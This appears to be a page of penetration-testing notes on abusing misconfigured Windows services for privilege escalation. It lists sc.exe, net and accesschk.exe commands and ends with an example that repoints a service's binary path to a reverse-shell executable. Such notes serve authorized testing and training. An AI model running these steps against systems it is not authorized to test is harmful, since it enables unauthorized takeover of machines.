Service Exploitation

Basic commands when abusing services to elevate privileges after being identified with a tool such as WinPEAS.

Basic Commands

# Query the configuration of a service
sc.exe qc $service_name

# Query the current status of a service
sc.exe query $service_name

# Modify an option on a service
sc.exe config $service_name $option= $value

# Start and stop a service
net start/stop $service_name

Accesschk.exe

Use Accesschk.exe to validate service permissions:

.\accesschk.exe /accepteula -uwcqv user $service_name

What we are looking for in the output is the SERVICE_START and SERVICE_STOP permissions.
We also want to confirm that it is running under a user with higher privileges (e.g., LocalSystem)

Notes

Validate if you can start/stop the service or the machine. If you cannot then you may not be able to use it to escalate your privileges.
Check if we can reboot the system with whoami /priv
An easy way to escalate privileges utilizing a service is to modify the binaries path. The following demonstrates an example of this:

sc config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""

PreviousSeLoadDriverPrivilege NextInitial Access

Last updated 2 years ago